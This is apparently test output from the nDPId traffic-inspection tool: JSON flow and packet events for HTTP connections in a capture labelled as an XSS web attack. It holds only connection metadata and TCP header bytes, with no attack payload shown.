-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":540,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347886296,"flow_last_seen":1499347891872,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348019064,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33728,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":540,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347886296,"flow_last_seen":1499347891872,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348019064,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33728,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":541,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347887572,"flow_last_seen":1499347892872,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348019064,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33742,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":541,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347887572,"flow_last_seen":1499347892872,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348019064,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33742,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":542,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347890192,"flow_last_seen":1499347895873,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348019064,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33768,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":542,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347890192,"flow_last_seen":1499347895873,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348019064,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33768,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":543,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347891536,"flow_last_seen":1499347896874,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348019064,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33782,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":543,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347891536,"flow_last_seen":1499347896874,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348019064,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33782,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":544,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347894093,"flow_last_seen":1499347899875,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348019064,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33808,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8723,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":544,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347894093,"flow_last_seen":1499347899875,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348019064,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33808,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8726,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":616,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348020357,"flow_last_seen":1499348020357,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348020357,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35128,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8726,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":616,"flow_packet_id":1,"flow_last_seen":1499348020357,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348020357,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8MF5AAD4GlXKsEAABwKgKMok4AFAr8NuwAAAAAKACchDgrwAAAgQFtAQCCAoBPOvuAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8727,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":616,"flow_packet_id":2,"flow_last_seen":1499348020357,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348020357,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiTgvWFvMK\/DbsaAScSCVIQAAAgQFtAQCCAoD5r1iATzr7gEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8728,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":616,"flow_packet_id":3,"flow_last_seen":1499348020358,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348020358,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0MF9AAD4GlXmsEAABwKgKMok4AFAr8NuxL1hbzYAQAOU0KQAAAQEICgE86+4D5r1i"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8738,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":617,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348021660,"flow_last_seen":1499348021660,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348021660,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35142,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8738,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":617,"flow_packet_id":1,"flow_last_seen":1499348021660,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348021660,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8T85AAD4GdgKsEAABwKgKMolGAFAJiKL6AAAAAKACchA6egAAAgQFtAQCCAoBPO00AAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8739,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":617,"flow_packet_id":2,"flow_last_seen":1499348021660,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348021660,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiUb24raMCYii+6AScSDLWgAAAgQFtAQCCAoD5r6oATztNAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8741,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":617,"flow_packet_id":3,"flow_last_seen":1499348021660,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348021660,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0T89AAD4GdgmsEAABwKgKMolGAFAJiKL79uK2jYAQAOVqYgAAAQEICgE87TQD5r6o"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8756,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":618,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348024206,"flow_last_seen":1499348024206,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348024206,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35168,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8756,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":618,"flow_packet_id":1,"flow_last_seen":1499348024206,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348024206,"pkt":"ABm5CmnxAMGxFOsxCABFAAA82E1AAD4G7YKsEAABwKgKMolgAFCsqjf8AAAAAKACchD\/vgAAAgQFtAQCCAoBPO+xAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8757,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":618,"flow_packet_id":2,"flow_last_seen":1499348024206,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348024206,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiWCF9T2qrKo3\/aAScSB38wAAAgQFtAQCCAoD5sEkATzvsQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8758,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":618,"flow_packet_id":3,"flow_last_seen":1499348024207,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348024207,"pkt":"ABm5CmnxAMGxFOsxCABFAAA02E5AAD4G7YmsEAABwKgKMolgAFCsqjf9hfU9q4AQAOUW+wAAAQEICgE877ED5sEk"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8769,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":619,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348025497,"flow_last_seen":1499348025497,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348025497,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35182,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8769,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":619,"flow_packet_id":1,"flow_last_seen":1499348025497,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348025497,"pkt":"ABm5CmnxAMGxFOsxCABFAAA856FAAD4G3i6sEAABwKgKMoluAFBIkhdSAAAAAKACchCDMQAAAgQFtAQCCAoBPPDzAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8770,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":619,"flow_packet_id":2,"flow_last_seen":1499348025497,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348025497,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiW4WAueQSJIXU6AScSDALwAAAgQFtAQCCAoD5sJnATzw8wEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8771,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":619,"flow_packet_id":3,"flow_last_seen":1499348025497,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348025497,"pkt":"ABm5CmnxAMGxFOsxCABFAAA056JAAD4G3jWsEAABwKgKMoluAFBIkhdTFgLnkYAQAOVfNwAAAQEICgE88PMD5sJn"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8790,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":620,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348028117,"flow_last_seen":1499348028117,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348028117,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35208,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8790,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":620,"flow_packet_id":1,"flow_last_seen":1499348028117,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348028117,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80XFAAD4G9F6sEAABwKgKMomIAFDG6SLzAAAAAKACchD2jwAAAgQFtAQCCAoBPPOCAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8791,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":620,"flow_packet_id":2,"flow_last_seen":1499348028117,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348028117,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiYg5g7TNxuki9KAScSBAQQAAAgQFtAQCCAoD5sT2ATzzggEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8792,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":620,"flow_packet_id":3,"flow_last_seen":1499348028118,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348028118,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00XJAAD4G9GWsEAABwKgKMomIAFDG6SL0OYO0zoAQAOXfRwAAAQEICgE884MD5sT2"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8799,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":621,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499348029395,"flow_last_seen":1499348029395,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348029395,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":35222,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8799,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":621,"flow_packet_id":1,"flow_last_seen":1499348029395,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348029395,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8DoBAAD4Gt1CsEAABwKgKMomWAFBGnvpCAAAAAKACchCePQAAAgQFtAQCCAoBPPTCAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8800,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":621,"flow_packet_id":2,"flow_last_seen":1499348029395,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348029395,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiZaKxK9BRp76Q6AScSCa+QAAAgQFtAQCCAoD5sY2ATz0wgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8801,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":621,"flow_packet_id":3,"flow_last_seen":1499348029395,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348029395,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0DoFAAD4Gt1esEAABwKgKMomWAFBGnvpDisSvQoAQAOU6AQAAAQEICgE89MID5sY2"} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":545,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347895396,"flow_last_seen":1499347900875,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348029909,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33822,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":545,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347895396,"flow_last_seen":1499347900875,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348029909,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33822,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":546,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347896716,"flow_last_seen":1499347901875,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348029909,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33836,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":546,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347896716,"flow_last_seen":1499347901875,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348029909,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33836,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":547,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347899275,"flow_last_seen":1499347904876,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348029909,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33862,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":547,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347899275,"flow_last_seen":1499347904876,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348029909,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33862,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":548,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347900544,"flow_last_seen":1499347905875,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348029909,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33876,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":548,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347900544,"flow_last_seen":1499347905875,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348029909,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33876,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":549,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347903125,"flow_last_seen":1499347908876,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348029909,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33902,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":549,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347903125,"flow_last_seen":1499347908876,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348029909,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33902,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":550,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347904387,"flow_last_seen":1499347909877,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348029909,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33916,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8808,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":550,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347904387,"flow_last_seen":1499347909877,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499348029909,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33916,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
